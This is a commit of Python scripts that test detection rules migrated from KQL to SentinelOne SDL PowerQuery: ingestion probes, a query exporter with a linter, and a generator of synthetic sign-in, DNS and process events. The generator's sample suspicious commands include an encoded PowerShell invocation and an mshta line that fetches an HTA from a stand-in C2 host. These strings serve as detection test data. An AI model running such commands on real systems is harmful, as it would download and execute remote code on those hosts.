Initial commit: KQL ↔ SDL PowerQuery proof of equivalence

2026-06-13 07:11:17 +00:00 · 2026-06-01 09:57:14 +02:00
commit 23cbaa9c08
91 changed files with 5966 additions and 0 deletions
@@ -0,0 +1,34 @@
+#!/usr/bin/env python3
+"""Count duplicate timestamps within the generated JSONL.
+
+SDL appears to dedupe addEvents by (session, ts) - events sharing a ts
+within the same session are silently dropped. If our generator emits many
+events at colliding ts_epoch_ms values, only one of each cluster survives.
+"""
+import json
+from collections import Counter, defaultdict
+from pathlib import Path
+
+JSONL = Path(__file__).resolve().parents[1] / "sample_data" / "events.jsonl"
+
+# Per event_type: how many events exist, and which distinct ts_epoch_ms
+# values they use. The difference is the number of events that collide on a
+# timestamp with another event of the same type.
+per_type_total = Counter()
+per_type_unique = defaultdict(set)
+with JSONL.open(encoding="utf-8") as f:
+    for line in f:
+        if not line.strip():
+            # A blank (e.g. trailing) line is not an event; json.loads would
+            # raise on it and abort the whole report.
+            continue
+        r = json.loads(line)
+        et = r["event_type"]
+        ts = r["ts_epoch_ms"]
+        per_type_total[et] += 1
+        per_type_unique[et].add(ts)
+
+# One row per event type: total events, distinct timestamps, and the
+# percentage of events that share a timestamp with another one.
+print(f"{'event_type':30s} {'events':>8} {'uniq_ts':>8} {'collision_loss%':>16}")
+print("-" * 70)
+for et in sorted(per_type_total):
+    n = per_type_total[et]
+    u = len(per_type_unique[et])
+    loss = 100 * (n - u) / n if n else 0
+    print(f"{et:30s} {n:>8} {u:>8} {loss:>15.1f}%")
+print("-" * 70)
+print(f"{'TOTAL':30s} {sum(per_type_total.values()):>8} "
+      f"{sum(len(s) for s in per_type_unique.values()):>8}")
@@ -0,0 +1,101 @@
+#!/usr/bin/env python3
+"""Diagnose why most of our 445 generated events are not queryable in SDL.
+
+Strategy:
+  1. Take 5 CommonSecurityLog events straight from the generated JSONL,
+     decorate them with a unique probe marker, and ingest as a single batch.
+  2. Wait 10 s for indexing.
+  3. Query for the marker to confirm they are queryable.
+  4. Then bulk-ingest the entire JSONL and report per-event-type counts in SDL
+     vs counts in the local file - to expose where the loss happens.
+"""
+from __future__ import annotations
+
+import json
+import sys
+import time
+from collections import Counter
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from harness.sdl_client import add_events, power_query, ingest_jsonl, _clean_attrs  # noqa: E402
+
+JSONL = ROOT / "sample_data" / "events.jsonl"
+MARKER = f"loss-probe-{int(time.time())}"
+RULE = "=" * 80
+
+# ---------------------------------------------------------------------------
+# Step 1: per-type counts in the local file
+# ---------------------------------------------------------------------------
+with JSONL.open() as fh:
+    local_counts = Counter(json.loads(raw)["event_type"] for raw in fh)
+
+print(RULE)
+print("Local JSONL event_type counts")
+print(RULE)
+for event_type in sorted(local_counts):
+    print(f"  {event_type:30s} {local_counts[event_type]}")
+print(f"  {'TOTAL':30s} {sum(local_counts.values())}")
+
+# ---------------------------------------------------------------------------
+# Step 2: pick 5 CSL events from disk, mark them, ingest, query
+# ---------------------------------------------------------------------------
+csl_events = []
+with JSONL.open() as fh:
+    for raw in fh:
+        record = json.loads(raw)
+        if record["event_type"] != "CommonSecurityLog":
+            continue
+        # Tag the record so the probe query below can find exactly this batch.
+        record["loss_marker"] = MARKER
+        epoch_ms = int(record["ts_epoch_ms"])
+        csl_events.append({
+            "ts": str(epoch_ms * 1_000_000),  # ms -> ns, sent as a string
+            "sev": 3,
+            "thread": "T1",
+            "attrs": _clean_attrs(record),
+        })
+        if len(csl_events) >= 5:
+            break
+
+print()
+print(RULE)
+print(f"Step 2: ingesting 5 marker-tagged CSL events ({MARKER})")
+print(RULE)
+add_reply = add_events(csl_events)
+print(f"addEvents -> {json.dumps(add_reply)}")
+print("waiting 10 s for indexing ...")
+time.sleep(10)
+
+probe_q = f"loss_marker='{MARKER}' | group n = count() by event_type"
+probe_reply = power_query(probe_q, "1h")
+print(f"probe query (1h) -> matching={probe_reply.get('matchingEvents')}, "
+      f"rows={probe_reply.get('values')}")
+
+# ---------------------------------------------------------------------------
+# Step 3: full bulk ingest of the file via the harness helper
+# ---------------------------------------------------------------------------
+print()
+print(RULE)
+print("Step 3: full bulk ingest of every event in JSONL")
+print(RULE)
+sent = ingest_jsonl(JSONL)
+print(f"ingest_jsonl reports {sent} events sent")
+print("waiting 20 s for indexing ...")
+time.sleep(20)
+
+# ---------------------------------------------------------------------------
+# Step 4: per-event-type count in SDL
+# ---------------------------------------------------------------------------
+print()
+print(RULE)
+print("Step 4: SDL counts by event_type")
+print(RULE)
+print(f"{'event_type':30s} {'local':>8} {'SDL':>8} {'loss%':>8}")
+print("-" * 60)
+for event_type in sorted(local_counts):
+    reply = power_query(f"event_type='{event_type}' | group n = count()", "1h")
+    values = reply.get("values")
+    # A missing/empty result or a null count both mean "nothing found".
+    sdl_n = int(values[0][0] or 0) if values else 0
+    local_n = local_counts[event_type]
+    loss = 100 * (local_n - sdl_n) / local_n if local_n else 0
+    print(f"{event_type:30s} {local_n:>8} {sdl_n:>8} {loss:>7.0f}%")
@@ -0,0 +1,46 @@
+#!/usr/bin/env python3
+"""Probe what data is actually queryable in SDL after ingestion."""
+from __future__ import annotations
+
+import json
+import sys
+import time
+from pathlib import Path
+
+sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
+from harness.sdl_client import power_query  # noqa: E402
+
+# (label, PowerQuery) pairs; every query is run over the same 30-day window.
+QUERIES = [
+    ("any serverHost=kql-proof",
+     "serverHost='kql-proof' | columns event_type, UserPrincipalName, ts_epoch_ms | limit 5"),
+    ("count by event_type",
+     "serverHost='kql-proof' | group n=count() by event_type"),
+    ("SigninLogs by user",
+     "serverHost='kql-proof' event_type='SigninLogs' | group n=count() by UserPrincipalName"),
+    ("SigninLogs min/max ts_epoch_ms",
+     "serverHost='kql-proof' event_type='SigninLogs' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()"),
+    ("recent SigninLogs (no time filter)",
+     "serverHost='kql-proof' event_type='SigninLogs' Location='RU' | columns UserPrincipalName, Location | limit 10"),
+    ("SecurityEvent EventID column type",
+     "serverHost='kql-proof' event_type='SecurityEvent' | columns EventID, NewProcessName | limit 5"),
+    ("Audit OperationName",
+     "serverHost='kql-proof' event_type='AuditLogs' | columns OperationName | limit 10"),
+]
+
+
+def _column_names(response):
+    """Return the column names of a response; entries may be dicts or bare names."""
+    return [col.get("name") if isinstance(col, dict) else col
+            for col in (response.get("columns") or [])]
+
+
+for name, q in QUERIES:
+    print("=" * 80)
+    print(f"# {name}")
+    print(f"  query: {q}")
+    started = time.time()
+    r = power_query(q, start_time="30d")
+    rows = r.get("values") or []
+    cols = _column_names(r)
+    elapsed = time.time() - started
+    print(f"  status={r.get('status')} matching={r.get('matchingEvents')} "
+          f"rows={len(rows)} took={elapsed:.1f}s")
+    status = r.get("status", "")
+    if status.startswith("error/"):
+        # Dump (a bounded prefix of) the whole response to aid debugging.
+        print(f"  ERROR_BODY: {json.dumps(r, indent=2)[:800]}")
+    if not rows:
+        continue
+    print(f"  cols: {cols}")
+    for row in rows[:5]:
+        print("    ", dict(zip(cols, row)))
@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+"""Wider probe: try a variety of filters and start windows to find our data."""
+import sys, time, json
+from pathlib import Path
+sys.path.insert(0, str(Path(__file__).resolve().parents[1]))
+from harness.sdl_client import power_query
+
+# (label, PowerQuery, start window) triples; each query gets its own window.
+QUERIES = [
+    ("event_type=SigninLogs 7d (no serverHost)",
+     "event_type='SigninLogs' | columns UserPrincipalName | limit 5", "7d"),
+    ("event_type=SigninLogs 1h",
+     "event_type='SigninLogs' | columns UserPrincipalName, ts_epoch_ms | limit 5", "1h"),
+    ("UserPrincipalName matching contoso",
+     "UserPrincipalName='alice@contoso.com' | columns event_type, UserPrincipalName | limit 5", "1d"),
+    ("anything from xdr tenant 1h",
+     "* | columns event_type, serverHost, logfile | limit 5", "1h"),
+    ("logfile contains kql-proof",
+     "logfile contains 'kql-proof' | columns event_type | limit 5", "7d"),
+    ("contoso.com in attrs",
+     "Identity contains 'contoso.com' | columns event_type, Identity | limit 5", "1d"),
+    ("test: count any events tenant-wide 5m",
+     "* | group n=count()", "5m"),
+]
+
+for name, q, window in QUERIES:
+    print("=" * 80)
+    print(f"# {name}  (start={window})")
+    print(f"  q: {q}")
+    started = time.time()
+    r = power_query(q, start_time=window)
+    rows = r.get("values") or []
+    # Column descriptors may be dicts (with a "name") or plain names.
+    cols = []
+    for col in r.get("columns") or []:
+        cols.append(col.get("name") if isinstance(col, dict) else col)
+    elapsed = time.time() - started
+    print(f"  status={r.get('status')} matching={r.get('matchingEvents')} "
+          f"rows={len(rows)} took={elapsed:.1f}s")
+    status = r.get("status", "")
+    if status.startswith("error/"):
+        print(f"  ERROR: {json.dumps(r)[:500]}")
+    # Show at most five rows as {column: value} mappings.
+    for row in rows[:5]:
+        print("    ", dict(zip(cols, row)))
@@ -0,0 +1,198 @@
+#!/usr/bin/env python3
+"""Export each rule's KQL and PowerQuery to disk.
+
+The exported `.pq` files are:
+  * SELF-CONTAINED and RUNNABLE — every template placeholder
+    (`{RECENT_MS}`) is substituted with a concrete value from the
+    current time anchor, so you can paste straight into SDL.
+  * PRETTY-PRINTED — one pipeline stage per line with continuation
+    indents, matching the style in pmoses-s1/claude-skills.
+  * HEADER-DECORATED — a `//`-comment block names the rule, describes
+    intent, lists field references, and tells the reader what
+    `startTime` to use when running the query.
+  * VALIDATED — after writing, every `.pq` is parsed for known
+    anti-patterns from the SentinelOne PowerQuery skill's pitfalls
+    list (literal `{` braces, deprecated `first()`/`last()`/
+    `percentile()`, leading `*` filter, missing leading pipe before
+    `join`/`union`, etc.). Errors abort the export so the published
+    repo never contains broken queries.
+"""
+from __future__ import annotations
+
+import json
+import re
+import sys
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from rules import RULES, NOW, RECENT_START, BASELINE_START  # noqa: E402
+
+
+# ---------------------------------------------------------------------------
+# Pretty-printer: turn a single-line PQ string into multi-line idiomatic form.
+# ---------------------------------------------------------------------------
+def _split_stages(pq: str) -> list[str]:
+    """Split *pq* on the stage separator ``" | "``, ignoring quoted text.
+
+    A plain ``str.split(" | ")`` also splits a pipe that sits inside a
+    single- or double-quoted literal (e.g. a regex ``'foo | bar'``), which
+    would later put a line break inside the literal and change the query.
+    """
+    parts: list[str] = []
+    cur: list[str] = []
+    quote = ""  # the quote character we are currently inside, or ""
+    i, n = 0, len(pq)
+    while i < n:
+        ch = pq[i]
+        if quote:
+            cur.append(ch)
+            # NOTE(review): assumes a backslash escapes the next character
+            # inside a literal - confirm against the PowerQuery grammar.
+            if ch == "\\" and i + 1 < n:
+                cur.append(pq[i + 1])
+                i += 2
+                continue
+            if ch == quote:
+                quote = ""
+        elif ch in "'\"":
+            quote = ch
+            cur.append(ch)
+        elif pq.startswith(" | ", i):
+            parts.append("".join(cur))
+            cur = []
+            i += 3
+            continue
+        else:
+            cur.append(ch)
+        i += 1
+    parts.append("".join(cur))
+    return parts
+
+
+def pretty(pq: str) -> str:
+    """Break a one-line PQ into idiomatic multi-line form.
+
+    Rule: every `|` that introduces a stage starts a new line; multi-clause
+    `group ... by ...` is split so each agg sits on its own indented line
+    and `by ...` lines up under `group`. Pipes inside quoted literals are
+    left alone.
+
+    Args:
+        pq: the query text, possibly spanning several lines.
+
+    Returns:
+        The reformatted query, one stage per line, without a trailing newline.
+    """
+    # Normalise whitespace
+    pq = re.sub(r"\s+", " ", pq).strip()
+
+    # Split on " | " into stages, but keep the leading initial filter
+    parts = _split_stages(pq)
+    head, stages = parts[0].strip(), [s.strip() for s in parts[1:]]
+
+    lines: list[str] = [head] if head else []
+    for s in stages:
+        # Break a long `group a=count(), b=sum(x) by f1, f2` into multi-line.
+        m = re.match(
+            r"^group\s+(.+?)\s+by\s+(.+)$", s, flags=re.IGNORECASE | re.DOTALL)
+        if m:
+            aggs_raw, bys = m.group(1), m.group(2)
+            # Split aggs on commas NOT inside parentheses
+            aggs = _split_top_level_commas(aggs_raw)
+            lines.append("| group " + aggs[0].strip() + ("," if len(aggs) > 1 else ""))
+            for a in aggs[1:-1]:
+                lines.append("        " + a.strip() + ",")
+            if len(aggs) > 1:
+                lines.append("        " + aggs[-1].strip())
+            lines.append("    by " + bys.strip())
+            continue
+
+        # Default: one stage per line
+        lines.append("| " + s)
+
+    return "\n".join(lines)
+
+
+def _split_top_level_commas(s: str) -> list[str]:
+    """Split *s* at every comma that is not nested inside parentheses.
+
+    Pieces are returned verbatim (surrounding whitespace is kept). A trailing
+    empty piece, e.g. after a final comma, is dropped; an empty input yields
+    an empty list.
+    """
+    pieces: list[str] = []
+    nesting = 0
+    start = 0
+    for pos, char in enumerate(s):
+        if char == "(":
+            nesting += 1
+        elif char == ")":
+            nesting -= 1
+        elif char == "," and nesting == 0:
+            pieces.append(s[start:pos])
+            start = pos + 1
+    tail = s[start:]
+    if tail:
+        pieces.append(tail)
+    return pieces
+
+
+# ---------------------------------------------------------------------------
+# Anti-pattern scanner — refuses to write a file containing known landmines.
+# ---------------------------------------------------------------------------
+# Each entry pairs a regular expression with the message reported when the
+# expression is found anywhere in the query text.
+PITFALLS: list[tuple[str, str]] = [
+    (
+        r"\{[A-Za-z_]+\}",
+        "Unsubstituted template placeholder (e.g. {RECENT_MS}). Substitute before writing.",
+    ),
+    (
+        r"\bfirst\s*\(",
+        "first(x) is unreliable — use min_by(x, ts_epoch_ms).",
+    ),
+    (
+        r"\blast\s*\(",
+        "last(x) is unreliable — use max_by(x, ts_epoch_ms).",
+    ),
+    (
+        r"\bpercentile\s*\(",
+        "percentile(x, N) is not a real function — use p50/p95/p99.",
+    ),
+    (
+        r"\bgroup_unique_values\s*\(",
+        "group_unique_values does not exist — use array_agg_distinct(x, N).",
+    ),
+    (
+        r"(?m)^\s*\*\s*(\||$)",
+        "Bare `*` as initial filter returns 500 — use `| limit 5` or `field = *`.",
+    ),
+    (
+        r"(?m)^\s*(join|union)\b",
+        "join/union must start with a leading `|`.",
+    ),
+    (
+        r"(?m)^\s*#(cmdline|name|hash|ip|storylineid|username|dns)\b",
+        "Shortcut fields (#cmdline, …) are unreliable across tenants — use the explicit field name.",
+    ),
+]
+
+
+def scan(text: str) -> list[str]:
+    """Return the message of every PITFALLS pattern found in *text*.
+
+    Messages come back in table order; an empty list means no pattern matched.
+    """
+    findings: list[str] = []
+    for pattern, message in PITFALLS:
+        if re.search(pattern, text) is not None:
+            findings.append(message)
+    return findings
+
+
+# ---------------------------------------------------------------------------
+# Header builder
+# ---------------------------------------------------------------------------
+def header(rule: dict, recent_iso: str, now_iso: str) -> str:
+    """Build the `//`-comment block that precedes an exported query.
+
+    Args:
+        rule: mapping with at least the keys "id", "description" and "pq".
+        recent_iso: the recent-window cutoff, already formatted for display.
+        now_iso: the export time anchor, already formatted for display.
+
+    Returns:
+        The header text; every line starts with `//` and the text ends with
+        a newline.
+    """
+    # Template placeholders ({RECENT_MS}) and quoted literal values
+    # ('SigninLogs') look like capitalised identifiers but are not fields, so
+    # blank them out before collecting field names.
+    query = re.sub(r"\{[A-Za-z_]+\}", " ", rule["pq"])
+    query = re.sub(r"'(?:\\.|[^'\\])*'|\"(?:\\.|[^\"\\])*\"", " ", query)
+    keywords = {"and", "or", "not", "true", "false",
+                "filter", "group", "by", "let", "columns",
+                "sort", "limit", "join", "union", "in",
+                "contains", "matches"}
+    field_refs = sorted({f for f in re.findall(
+        r"\b[A-Z][A-Za-z0-9_]+\b", query)
+        if f.lower() not in keywords})
+    # Prefix every description line so a multi-line description cannot leave
+    # uncommented text in the query file.
+    description_lines = [
+        f"// {line}"
+        for line in (str(rule["description"]).splitlines() or [""])
+    ]
+    lines = [
+        f"// Rule: {rule['id']}",
+        *description_lines,
+        "//",
+        "// Source KQL: see ../kql/" + rule['id'] + ".kql",
+        "//",
+        "// HOW TO RUN",
+        "//   curl POST {sdl}/api/powerQuery with this body, OR paste in",
+        "//   the SDL console. Set startTime = '2h' (or wider) so the API",
+        "//   scans the freshly-ingested epochs that contain the events.",
+        "//",
+        f"// Time anchor at export: NOW = {now_iso}",
+        f"// Recent-window cutoff:  {recent_iso}",
+        "//   (`ts_epoch_ms` below is that cutoff expressed in ms.",
+        "//   Re-run harness/export_rules.py to refresh after regenerating",
+        "//   sample_data/events.jsonl.)",
+        "//",
+        # Only the first ten names are listed; an ellipsis marks truncation.
+        "// Fields referenced: " + ", ".join(field_refs[:10])
+        + ("…" if len(field_refs) > 10 else ""),
+        "//",
+        "// EDITING NOTE",
+        "//   Every line that starts with `|` is a pipeline stage. Each `|`",
+        "//   is REQUIRED. If you delete one (e.g. while changing a literal",
+        "//   on the same line as a stage), SDL re-parses the keyword that",
+        "//   follows as a search term and rejects the query with errors",
+        "//   like `'estimate_distinct' is a grouping function`.",
+    ]
+    return "\n".join(lines) + "\n"
+
+
+# ---------------------------------------------------------------------------
+# Main
+# ---------------------------------------------------------------------------
+def main() -> None:
+    """Export every rule in RULES to `pq/<id>.pq` and `kql/<id>.kql`.
+
+    For each rule the `{RECENT_MS}` placeholder is substituted, the query is
+    pretty-printed and then scanned for anti-patterns. A rule that fails the
+    scan is not written; after all rules are processed the failures are
+    printed and the process exits with status 1.
+    """
+    recent_ms = int(RECENT_START.timestamp() * 1000)
+    recent_iso = RECENT_START.isoformat()
+    now_iso = NOW.isoformat()
+
+    # Create the output directories up front so a fresh checkout does not
+    # fail with FileNotFoundError on the first write.
+    pq_dir = ROOT / "pq"
+    kql_dir = ROOT / "kql"
+    for out_dir in (pq_dir, kql_dir):
+        out_dir.mkdir(parents=True, exist_ok=True)
+
+    failures: list[tuple[str, list[str]]] = []
+    for r in RULES:
+        # 1. substitute placeholders
+        body = r["pq"].replace("{RECENT_MS}", str(recent_ms))
+        # 2. pretty-print
+        body = pretty(body)
+        # 3. scan
+        bad = scan(body)
+        if bad:
+            failures.append((r["id"], bad))
+            continue
+        # 4. write (explicit UTF-8: the header contains non-ASCII characters,
+        #    which the locale's default encoding may not be able to encode)
+        text = header(r, recent_iso, now_iso) + "\n" + body + "\n"
+        (pq_dir / f"{r['id']}.pq").write_text(text, encoding="utf-8")
+
+        # Mirror the .kql (verbatim, no substitution)
+        (kql_dir / f"{r['id']}.kql").write_text(
+            r["kql"].strip() + "\n", encoding="utf-8")
+
+    if failures:
+        print("✗ Export failed — anti-patterns detected:")
+        for rid, msgs in failures:
+            print(f"  {rid}")
+            for m in msgs:
+                print(f"    - {m}")
+        sys.exit(1)
+
+    print(f"✓ Exported {len(RULES)} rules to kql/ and pq/")
+    print(f"  (RECENT_MS = {recent_ms} = {recent_iso})")
+
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,39 @@
+#!/usr/bin/env python3
+"""Find SDL's age cutoff for addEvents by sending probe events at increasing
+ages and seeing which ones become queryable."""
+import json, sys, time, uuid
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
+from harness.sdl_client import add_events, power_query
+
+TS_NOW_MS = int(time.time() * 1000)
+PROBE = uuid.uuid4().hex[:8]
+
+# 30s, 5min, 30min, 1h, 2h, 4h, 6h, 12h, 24h
+ages_min = [0.5, 5, 30, 60, 120, 240, 360, 720, 1440]
+
+# One probe event per age, all sent in a single addEvents batch. Each event
+# carries its own probe id and its age so the query result can be matched up.
+events = [
+    {
+        "ts": str((TS_NOW_MS - int(age * 60 * 1000)) * 1_000_000),
+        "sev": 3,
+        "thread": "T1",
+        "attrs": {
+            "event_type": "CommonSecurityLog",
+            "probe": f"{PROBE}_{idx:02d}",
+            "age_min": age,
+        },
+    }
+    for idx, age in enumerate(ages_min)
+]
+
+print(f"Sending {len(events)} events at ages {ages_min} min")
+reply = add_events(events)
+print(f"addEvents -> {json.dumps(reply)}")
+
+print("\nWaiting 12 s ...")
+time.sleep(12)
+
+print(f"\nQuerying probe '{PROBE}' over last 48h ...")
+query = f"probe contains '{PROBE}' | columns probe, age_min | limit 100"
+res = power_query(query, "48h")
+n = res.get("matchingEvents", 0)
+vals = res.get("values") or []
+print(f"matching={n}")
+
+# Second column of each returned row is age_min (see `columns` above).
+got = {row[1] for row in vals}
+print(f"\n{'age_min':>8}  {'sent':>6}  {'queryable':>10}")
+for age in ages_min:
+    if age in got:
+        landed = "YES"
+    else:
+        landed = "NO"
+    print(f"  {age:>6}     {'yes':>6}  {landed:>10}")
@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+"""Send one event per batch (separate addEvents call) at different ages,
+each with a fresh session. This isolates whether SDL is rejecting based on
+mixed-age batches or just on event age."""
+import json, sys, time, uuid, importlib
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
+
+PROBE = uuid.uuid4().hex[:8]
+ages_min = [0.5, 5, 30, 60, 120, 240, 480, 720, 1440]
+
+# Force a fresh session for *every* probe so we eliminate session dedup
+import harness.sdl_client as sdl
+
+results = []
+for idx, age_minutes in enumerate(ages_min):
+    importlib.reload(sdl)         # re-roll the SESSION UUID
+    event_ms = int(time.time() * 1000) - int(age_minutes * 60 * 1000)
+    probe_value = f"{PROBE}_{idx:02d}"
+    attrs = {"event_type": "CommonSecurityLog", "probe": probe_value,
+             "age_min": age_minutes}
+    event = {"ts": str(event_ms * 1_000_000), "sev": 3, "thread": "T1",
+             "attrs": attrs}
+    # One event per addEvents call, so batches never mix ages.
+    reply = sdl.add_events([event])
+    print(f"age={age_minutes:>6} min  session={sdl.SESSION[-12:]}  addEvents={reply}")
+    results.append((age_minutes, probe_value))
+
+print("\nWaiting 12 s ...")
+time.sleep(12)
+
+q = f"probe contains '{PROBE}' | columns probe, age_min | limit 100"
+res = sdl.power_query(q, "48h")
+n = res.get("matchingEvents", 0)
+vals = res.get("values") or []
+print(f"\nQuery matching={n}")
+
+# Second column of each returned row is age_min (see `columns` above).
+got = {row[1] for row in vals}
+print(f"\n{'age_min':>8}  {'queryable':>10}")
+for age_minutes, _probe_value in results:
+    landed = "NO"
+    if age_minutes in got:
+        landed = "YES"
+    print(f"  {age_minutes:>6}     {landed:>10}")
@@ -0,0 +1,220 @@
+"""Ingest realistic events to SDL to exercise the 3-way join PowerQuery:
+
+  identity sign_in failures  x  suspicious DNS  x  suspicious process_start
+
+Joined on (user_name) and (host). Events are spread across the last 4 hours.
+"""
+from __future__ import annotations
+
+import random
+import time
+from pathlib import Path
+import sys
+
+ROOT = Path(__file__).resolve().parent
+sys.path.insert(0, str(ROOT))
+from sdl_client import add_events, power_query  # noqa: E402
+
+# Reference "now" captured once at import, in epoch milliseconds; rand_ts()
+# places every generated event within WINDOW_MS before this instant.
+NOW_MS = int(time.time() * 1000)
+WINDOW_MS = 4 * 60 * 60 * 1000  # 4h
+
+# --- Personas that will land in ALL 3 streams (these will join) --------------
+JOIN_TARGETS = [
+    # (user, host)
+    ("alice.smith",   "wks-alice-01"),
+    ("bob.jones",     "wks-bob-02"),
+    ("carol.nguyen",  "wks-carol-03"),
+]
+
+# Users that only fail logins (no DNS/proc match)  → in failed-only
+NOISE_FAILED_USERS = ["dave.kim", "erin.lopez", "frank.singh"]
+
+# Hosts that have suspicious procs but no DNS hit → noise on proc side
+NOISE_PROC_HOSTS = ["srv-build-01", "srv-jenkins-02"]
+
+# Domain names and command lines the generators pick from at random. The
+# SUSPECT_* values are the ones the verification query in main() matches on;
+# the BENIGN_* values are filler that the query should ignore.
+SUSPECT_DOMAINS = ["c2.example.net", "suspect.example.org", "c2.example.io"]
+BENIGN_DOMAINS  = ["microsoft.com", "google.com", "github.com"]
+SUSPECT_CMDS = [
+    "powershell.exe -enc SQBFAFgAIA==",
+    "rundll32.exe shell32.dll,Control_RunDLL",
+    "mshta.exe http://c2.example.net/x.hta",
+]
+BENIGN_CMDS = ["explorer.exe", "chrome.exe --no-sandbox", "code.exe"]
+
+
+def rand_ts() -> str:
+    """Return a random timestamp from the last 4h as a nanosecond-epoch string."""
+    offset_ms = random.randint(0, WINDOW_MS - 1)
+    return str((NOW_MS - offset_ms) * 1_000_000)
+
+
+def evt(ts_ns: str, attrs: dict) -> dict:
+    """Wrap *attrs* in an event dict with timestamp *ts_ns*, sev 3 and thread "T1"."""
+    return dict(ts=ts_ns, sev=3, attrs=attrs, thread="T1")
+
+
+def gen_failed_signins() -> list[dict]:
+    """Generate the identity sign-in stream.
+
+    Contains 8-15 failures (with a source IP) per JOIN_TARGETS user, 2-6
+    failures per NOISE_FAILED_USERS user, and 3 successes per JOIN_TARGETS
+    user that a status='failure' filter should drop.
+    """
+    def sign_in(user: str, status: str, with_ip: bool = False) -> dict:
+        # Draw the timestamp before the IP octet: main() seeds the RNG, so
+        # the order of random calls determines the generated data.
+        ts = rand_ts()
+        attrs = {
+            "dataSource.category": "identity",
+            "dataSource.vendor":   "azure-ad",
+            "activity_name":       "sign_in",
+            "status":              status,
+            "user.name":           user,
+        }
+        if with_ip:
+            attrs["src_endpoint.ip"] = f"203.0.113.{random.randint(2,254)}"
+        return evt(ts, attrs)
+
+    events: list[dict] = []
+    # Users in JOIN_TARGETS get many failures (so they "stand out")
+    for user, _host in JOIN_TARGETS:
+        events.extend(sign_in(user, "failure", with_ip=True)
+                      for _ in range(random.randint(8, 15)))
+    # Noise: failed-only users
+    for user in NOISE_FAILED_USERS:
+        events.extend(sign_in(user, "failure")
+                      for _ in range(random.randint(2, 6)))
+    # Some successes (should be filtered out by status='failure')
+    for user, _host in JOIN_TARGETS:
+        events.extend(sign_in(user, "success") for _ in range(3))
+    return events
+
+
+def gen_dns() -> list[dict]:
+    """Generate the DNS query stream.
+
+    Each JOIN_TARGETS (user, host) pair gets 3-6 suspicious lookups followed
+    by 5 benign ones; two users outside JOIN_TARGETS get 3 suspicious lookups
+    each on their own hosts.
+    """
+    def dns_query(user: str, host: str, domains: list[str]) -> dict:
+        # Timestamp first, then the domain pick, to keep the order of random
+        # calls (and therefore the seeded output) stable.
+        ts = rand_ts()
+        return evt(ts, {
+            "dataSource.category": "network",
+            "dataSource.vendor":   "zeek",
+            "activity_name":       "dns_query",
+            "user.name":           user,
+            "device.hostname":     host,
+            "dns.question.name":   random.choice(domains),
+        })
+
+    events: list[dict] = []
+    for user, host in JOIN_TARGETS:
+        # suspicious DNS for these users on their hosts
+        events.extend(dns_query(user, host, SUSPECT_DOMAINS)
+                      for _ in range(random.randint(3, 6)))
+        # benign DNS noise from same users
+        events.extend(dns_query(user, host, BENIGN_DOMAINS)
+                      for _ in range(5))
+    # Noise: suspicious DNS for users NOT in JOIN_TARGETS (won't join failed)
+    for user in ["greg.wu", "helen.park"]:
+        noise_host = f"wks-{user.split('.')[0]}-99"
+        events.extend(dns_query(user, noise_host, SUSPECT_DOMAINS)
+                      for _ in range(3))
+    return events
+
+
+def gen_process() -> list[dict]:
+    """Generate the process_start stream.
+
+    Each JOIN_TARGETS host gets 4-8 suspicious command lines followed by 5
+    benign ones; each NOISE_PROC_HOSTS host gets 3 suspicious command lines.
+    """
+    def process_start(host: str, commands: list[str]) -> dict:
+        # Timestamp first, then the command pick, to keep the order of random
+        # calls (and therefore the seeded output) stable.
+        ts = rand_ts()
+        return evt(ts, {
+            "dataSource.category": "process",
+            "dataSource.vendor":   "sentinelone",
+            "activity_name":       "process_start",
+            "device.hostname":     host,
+            "process.cmd_line":    random.choice(commands),
+        })
+
+    events: list[dict] = []
+    for _user, host in JOIN_TARGETS:
+        events.extend(process_start(host, SUSPECT_CMDS)
+                      for _ in range(random.randint(4, 8)))
+        # benign procs on the same hosts
+        events.extend(process_start(host, BENIGN_CMDS) for _ in range(5))
+    # Noise: suspicious procs on hosts that don't appear in DNS stream
+    for host in NOISE_PROC_HOSTS:
+        events.extend(process_start(host, SUSPECT_CMDS) for _ in range(3))
+    return events
+
+
+def chunked(seq: list, n: int):
+    """Yield consecutive slices of *seq* holding at most *n* items each."""
+    yield from (seq[start:start + n] for start in range(0, len(seq), n))
+
+
+def main() -> None:
+    """Generate the demo events, ingest them in batches, then run the join.
+
+    The RNG is seeded so the generated events are reproducible apart from
+    their timestamps, which are relative to NOW_MS.
+
+    Raises:
+        RuntimeError: if an addEvents call does not report status "success".
+    """
+    random.seed(42)
+    events = gen_failed_signins() + gen_dns() + gen_process()
+    random.shuffle(events)
+    print(f"Generated {len(events)} events across the last 4h")
+
+    sent = 0
+    for batch in chunked(events, 200):
+        r = add_events(batch, session_info={
+            "serverHost": "join-demo",
+            "logfile":    "join-demo.jsonl",
+            "parser":     "json",
+        })
+        if r.get("status") != "success":
+            raise RuntimeError(f"addEvents failed: {r}")
+        sent += len(batch)
+        print(f"  ingested {sent}/{len(events)}")
+        time.sleep(0.25)  # brief pause between batches
+    print(f"Done. {sent} events ingested.")
+
+    # Quick verification: run the user's PowerQuery against last 4h
+    pq = r'''| join
+    failed = (
+      dataSource.category = 'identity' AND activity_name = 'sign_in' AND status = 'failure'
+      | columns user_name = user.name
+      | group failed_signins = count() by user_name
+    ),
+    dns = (
+      dataSource.category = 'network' AND activity_name = 'dns_query'
+      AND dns.question.name matches "(c2|suspect)\.example\."
+      | columns user_name = user.name, host = device.hostname, dns_name = dns.question.name
+    ),
+    proc = (
+      dataSource.category = 'process' AND activity_name = 'process_start'
+      AND process.cmd_line matches "(powershell|rundll32|mshta)"
+      | columns host = device.hostname, cmd_line = process.cmd_line
+    )
+    on failed.user_name = dns.user_name, dns.host = proc.host'''
+
+    print("\nWaiting 20s for SDL indexing, then running the join...")
+    time.sleep(20)
+    res = power_query(pq, start_time="4h")
+    if isinstance(res, dict):
+        # The other harness scripts read result rows from "values"; check
+        # that key first and keep the previous keys as fallbacks.
